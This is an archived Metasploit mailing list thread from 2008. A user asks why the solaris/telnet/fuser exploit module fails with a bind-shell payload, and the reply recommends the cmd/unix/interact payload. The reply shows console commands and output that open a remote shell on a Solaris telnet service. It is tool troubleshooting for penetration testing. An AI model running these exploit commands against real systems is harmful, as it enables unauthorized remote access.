Metasploit mailing list archives

solaris/telnet/fuser


From: mc at metasploit.com (MC)
Date: Tue, 14 Oct 2008 18:04:08 -0400 (EDT)

hey josh! the only compatible payload is the 'cmd/unix/interact'

msf exploit(fuser) > set PAYLOAD cmd/unix/interact
PAYLOAD => cmd/unix/interact
msf exploit(fuser) > exploit
[*] Setting USER environment variable...
[*] Found shell.
[*] Command shell session 1 opened (x.x.x.x:49172 -> x.x.x.x:23)

$ VdptAJHKiDCyEwGz
$ uname -a
uname -a
SunOS sol-shiz 5.10 Generic_118855-33 i86pc i386 i86pc
$ 

..the same for the ttyprompt bug.
 On Tue, 14 Oct 2008, Joshua Smith wrote:

{HD, *}@metasploit.com,
Amazing piece of code.  I'm honestly in awe every time I use it.

All,
I apologize in advance if this ends up being a stupid question.  Also, I'm lucky enough to know the author of this 
module so I put the question to him too, will let the list know if he comes up w/anything

Question:
root at laptop:~/framework-trunk# ./msfcli solaris/telnet/fuser RHOST=192.168.1.1 PAYLOAD=solaris/x86/shell_bind_tcp E
[*] Started bind handler
[*] Setting USER environment variable...
[-] Exploit failed: undefined method `put' for nil:NilClass

Not surprisingly I get the same thing w/the SPARC version

Not important, but when I run 
./msfcli solaris/telnet/fuser RHOST=192.168.1.1 P
I get
Compatible payloads
===================

   Name  Description  
   ----  -----------  
and that's it.  

I'm running Ubuntu 8.04 Hardy Heron, kernel ver: 2.6.24-19, ruby 1.8.6, and I just ran an SVN update
Any ideas?
 -Josh



      

-- 
~ mc




Current thread: